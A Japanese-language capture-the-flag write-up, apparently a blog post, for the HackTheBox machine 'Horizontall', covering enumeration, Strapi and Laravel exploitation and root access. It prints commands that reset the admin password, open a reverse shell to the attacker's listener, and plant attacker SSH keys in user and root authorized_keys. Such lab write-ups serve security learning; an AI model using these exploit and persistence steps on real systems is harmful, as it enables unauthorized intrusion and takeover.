🔥

HackTheBox Horizontall

2022/09/30に公開

Linux

Horizontall

侵入

nmap

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.105 -oN nmap.log
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb

22、80番を確認

web

vhost

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 2>/dev/null -o gobuster_vhost.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://horizontall.htb/
[+] Method:       GET
[+] Threads:      150
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/09/29 22:09:23 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
===============================================================
2022/09/29 22:12:34 Finished
===============================================================

新たなサブドメイン api-prod.horizontall.htb を発見

api-prod.horizontall.htb

Welcome という文字だけが表示された

dir

新たなサブドメインに対して、ディレクトリ探索を行う

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir_prod.log 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://api-prod.horizontall.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/29 22:12:56 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 854]
/Admin                (Status: 200) [Size: 854]
/ADMIN                (Status: 200) [Size: 854]
/favicon.ico          (Status: 200) [Size: 1150]
/index.html           (Status: 200) [Size: 413]
/reviews              (Status: 200) [Size: 507]
/robots.txt           (Status: 200) [Size: 121]
/users                (Status: 403) [Size: 60]
===============================================================
2022/09/29 22:17:16 Finished
===============================================================

複数のディレクトリを発見

admin

ログイン画面が表示された
通信を確認してみると、/admin/init へのリクエストも飛んでいた

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 29 Sep 2022 13:20:20 GMT
Vary: Origin
Content-Security-Policy: img-src 'self' http:; block-all-mixed-content
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: Strapi <strapi.io>

{
　　"data":{
　　　　"uuid":"a55da3bd-9693-4a08-9279f9df57fd1817",
　　　　"currentEnvironment":"development",
　　　　"autoReload":false,
  "strapiVersion":"3.0.0-beta.17.4"
　　}
}

内容をみると、strapi のバージョン情報を発見
脆弱性を調べると、Exploit DB にコードを発見したので、実行する

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ python3 50239.py http://api-prod.horizontall.htb                                  
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY0NDU4NjgxLCJleHAiOjE2NjcwNTA2ODF9.ocIcsjf32a7JI4559q8wWlJdHQs5slkHVjpqXONF-m8

Exploit DB -> https://www.exploit-db.com/exploits/50239
成功していそうなので、新しい認証情報を使用し、ログインできるか試す

ログインできた

ログインしてすぐに、Users が気になったが、情報は何も得られない

探索再開後、Upload 画面も確認したが、悪用はできなかった。

strapi としてのシェル

CVE-2019-19609

パスワードとともに、JWT を取得できたため、これを利用して exploit を実行する
GitHub -> https://github.com/diego-tella/CVE-2019-19609-EXPLOIT

┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2019-19609-EXPLOIT]
└─$ python exploit.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY0NDU4NjgxLCJleHAiOjE2NjcwNTA2ODF9.ocIcsjf32a7JI4559q8wWlJdHQs5slkHVjpqXONF-m8 -l 10.10.14.12 -p 5555
[+] Exploit for Remote Code Execution for strapi-3.0.0-beta.17.7 and earlier (CVE-2019-19609)
[+] Remember to start listening to the port 5555 to get a reverse shell
[+] Sending payload... Check if you got shell

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.105] 43096
/bin/sh: 0: can't access tty; job control turned off
$ whoami
strapi

侵入成功

user フラグ

strapi@horizontall:/home/developer$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

所有は developer ユーザだが、読み込み権限があるため、フラグの取得に成功

権限昇格

netstat

strapi@horizontall:~$ netstat -tulpn | grep LISTEN 
netstat -tulpn | grep LISTEN
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1824/node /usr/bin/ 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

8000 番が動いていることがわかる
127.0.0.1 であるため、curl コマンドを使ってアクセスしてみる

curl http://127.0.0.1:8000/
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>Laravel</title>
    <head>
<a href="https://github.com/sponsors/taylorotwell" class="ml-1 underline">
                                Sponsor
                            </a>
                        </div>
                    </div>

                    <div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0">
                            Laravel v8 (PHP v7.4.18)
                    </div>
</html>

Laravel と PHP のバージョンを確認
GitHub で exploit コードを検索したところ使用できそうなコードを発見

SSH

攻撃コードは localhost にしか実行できないらしいので、SSHポートフォワーディングを行う

strapi@horizontall:~$ mkdir ./.ssh
mkdir ./.ssh
strapi@horizontall:~$ cd .ssh
cd .ssh
strapi@horizontall:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDmqzbEd10rlD7KND6fxxxJF+MPNcuokcTtG/FOo1UyAG2bIvZq37CM3LGmpb74qbHvoJbp2NG9xIDHK2cYSnaTeu8burZXlin3hcRoGh38PP9jXZTUKp9O3Piw9jJbWWaSe59IYlinL7cVHATUi2g8i/AhQrdNMHN1InsX0Ak3aROUXWqBy5pQyd+oLQH1i4eM0nYK1PmFgStVzdXCxySaPAw0l5lgSxeqj/cOdA74RUmyrcvkNFXGCNV8M38XQWLg+sjZd8zaUSM8jU4gleFxe7RInl06wk+bhj6QjU3+gGS+Bh7ROEQ2nFw5XO5AWLXwALwbC+FSvzWkNmOzS0yGUelFuKrSb51YJSMMwZ0XCWhJXUqiVVfWiaqL0PuDAOG5k/mbtC2NIPoOGE2r5+sz0RI3M0S5u4Qtg0J8dyhr6XjWPHK3LC4yWn2bDodDEFY8rj2QfwQ50QHG10G2NDW+vjojdmpZAFqTGN+rqKc0XJyAJxhbL/Ya2OR1oeelf1E= kali@kali" > authorized_keys
<yAJxhbL/Ya2OR1oeelf1E= kali@kali" > authorized_keys

サーバに、公開鍵を作成

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ ssh -i /home/kali/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Sep 29 14:49:08 UTC 2022

  System load:  0.0               Processes:           179
  Usage of /:   82.3% of 4.85GB   Users logged in:     0
  Memory usage: 44%               IP address for eth0: 10.10.11.105
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Fri Jun  4 11:29:42 2021 from 192.168.1.15
$ whoami
strapi

SSH 接続成功

127.0.0.1:8000 で kali 側からアクセスすることができた

root としてのシェル

exploit

攻撃の準備は整ったので、コードを実行する
GitHub -> https://github.com/nth347/CVE-2021-3129_exploit

┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 "whoami"                
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

root

[i] Trying to clear logs
[+] Logs cleared

コマンドが実行され、root 権限であることがわかる
今回は、SSH で接続する

┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 "mkdir -p /root/.ssh"                                                   1 ⨯
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared

先程と同様に、ディレクトリを作る

┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 'echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDmqzbEd10rlD7KND6fxxxJF+MPNcuokcTtG/FOo1UyAG2bIvZq37CM3LGmpb74qbHvoJbp2NG9xIDHK2cYSnaTeu8burZXlin3hcRoGh38PP9jXZTUKp9O3Piw9jJbWWaSe59IYlinL7cVHATUi2g8i/AhQrdNMHN1InsX0Ak3aROUXWqBy5pQyd+oLQH1i4eM0nYK1PmFgStVzdXCxySaPAw0l5lgSxeqj/cOdA74RUmyrcvkNFXGCNV8M38XQWLg+sjZd8zaUSM8jU4gleFxe7RInl06wk+bhj6QjU3+gGS+Bh7ROEQ2nFw5XO5AWLXwALwbC+FSvzWkNmOzS0yGUelFuKrSb51YJSMMwZ0XCWhJXUqiVVfWiaqL0PuDAOG5k/mbtC2NIPoOGE2r5+sz0RI3M0S5u4Qtg0J8dyhr6XjWPHK3LC4yWn2bDodDEFY8rj2QfwQ50QHG10G2NDW+vjojdmpZAFqTGN+rqKc0XJyAJxhbL/Ya2OR1oeelf1E= kali@kali" > /root/.ssh/authorized_keys'
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared

その後、公開鍵を authorized_keys として作成

┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ ssh -i /home/kali/.ssh/id_rsa root@10.10.11.105                                                                       130 ⨯
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Sep 29 15:08:45 UTC 2022

  System load:  0.03              Processes:           183
  Usage of /:   82.3% of 4.85GB   Users logged in:     1
  Memory usage: 44%               IP address for eth0: 10.10.11.105
  Swap usage:   0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug 23 11:27:49 2021 from 10.10.14.6
root@horizontall:~# whoami
root

権限昇格成功

root フラグ

root@horizontall:~# cat root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

フラグ取得

所感

今回のボックスは、楽しいボックスだった。strapi のバージョンを早く確認できたおかげで、スムーズに攻略することができた。最後の権限昇格のやり方に関しては、他にも多くの手法があるようなので、いろいろと試していきたい。